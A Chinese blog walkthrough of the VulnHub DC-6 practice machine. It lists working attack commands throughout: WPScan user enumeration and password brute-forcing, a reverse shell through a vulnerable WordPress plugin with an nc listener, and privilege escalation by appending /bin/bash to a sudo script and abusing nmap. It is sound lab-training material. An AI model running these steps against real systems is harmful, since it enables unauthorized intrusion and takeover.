DC系列DC-6靶机渗透

Posted Nikris

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DC系列DC-6靶机渗透相关的知识,希望对你有一定的参考价值。

0x00 前期准备

DC-6地址:https://www.vulnhub.com/entry/dc-6,315/
DC-6官wp:无

  1. 成功导入。

  2. 官方要求把dc6的地址加入/etc/hosts。

  3. 在kali终端扫描:nmap 172.20.10.0/24,找到dc6的ip地址为172.20.10.4。

  4. 加入/etc/hosts。

0x01 登陆

  1. 前期nmap扫描得开放80、22端口,访问网站。CMS采用WordPress。

  2. 使用WPScan工具分析:wpscan --url http://wordy --enumerate,扫描到五个用户。

  3. 把五个用户写入dc6user.txt,为后续准备。

  4. 官网提示使用rocket.txt:cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6passwd.txt。如果是第一次使用rockyou.txt,需要先进行解压:gzip -d /usr/share/wordlists/rockyou.txt.gz

  5. wpscan爆破:wpscan --url http://wordy/ -U dc6user.txt -P dc6passwd.txt,得到用户mark,密码helpdesk01。

  6. 回到网页,寻找登陆页面:dirb http://wordy/,找到http://wordy/wp-admin。

  7. 访问登陆界面,尝试用获取的mark-helpdesk01登陆。

0x02 利用activity_monitor漏洞反弹shell

  1. 登录后可以看到安装了activity_monitor插件。猜测存在漏洞。

  2. 查找漏洞searchsploit activity monitor -w

  3. 点击查看网页漏洞。

  4. html代码部分写入本地45274.html,修改相关地址。

  5. Kali开启3456端口:python2 -m SimpleHTTPServer 3456,打开网页172.20.10.3:3456,找到45274.html并打开。

  6. 同时,在kali监听7788端口:nc -lvvp 7788。点击网页的submit request,在kali终端显示反弹shell成功。

0x03 bash脚本和nmap提权

  1. 使用交互式命令行:python -c 'import pty; pty.spawn("/bin/bash"),找到mark用户的家目录下的stuff文件夹,查看里面的things-to-do.txt。

  2. 提示添加了新用户:graham - GSo7isUM1D4。切换用户:su graham

  3. 查询graham用户的root权限指令:sudo -l,看到jens目录下有bash脚本。

  4. 切换到该目录下查看backup.sh,内容是压缩备份web的文件。写入:echo "/bin/bash" >> backups.sh,意味着它会打开一个shell(此处会打开jens用户的shell)。

  5. 使用jens的身份执行该脚本:sudo -u jens /home/jens/backups.sh,切换成功。同时查看jens的root权限,发现有nmap。

  6. 在https://gtfobins.github.io/中查询到nmap的sudo提权方式如下,依次输入,提权成功。

    TF=$(mktemp)
    echo 'os.execute("/bin/sh")' > $TF
    sudo nmap --script=$TF
    

  7. 进入root根目录,找到theflag.txt,渗透成功。

以上是关于DC系列DC-6靶机渗透的主要内容,如果未能解决你的问题,请参考以下文章

DC-6靶机

DC-6靶机

Vulnhub-DC-6靶机实战(Nmap提权)

DC-9 靶机渗透测试

渗透测试学习之靶机DC-2

Vulnhub靶机渗透测试实战:入门DC-1靶机完全渗透